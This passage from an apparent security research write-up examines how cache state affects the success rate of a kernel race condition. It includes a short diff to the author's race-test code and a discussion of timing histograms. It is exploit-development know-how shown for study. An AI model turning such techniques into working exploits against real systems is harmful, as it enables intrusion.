The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@



+#if 0

     // bounce socket's file refcount over to other cpu






     //printf("setting timer\n");

@@ -352,5 +354,5 @@


     while (ts_is_in_future(spin_stop))

-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));

+      close(SYSCHK(dup(RESURRECT_FD)));

     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):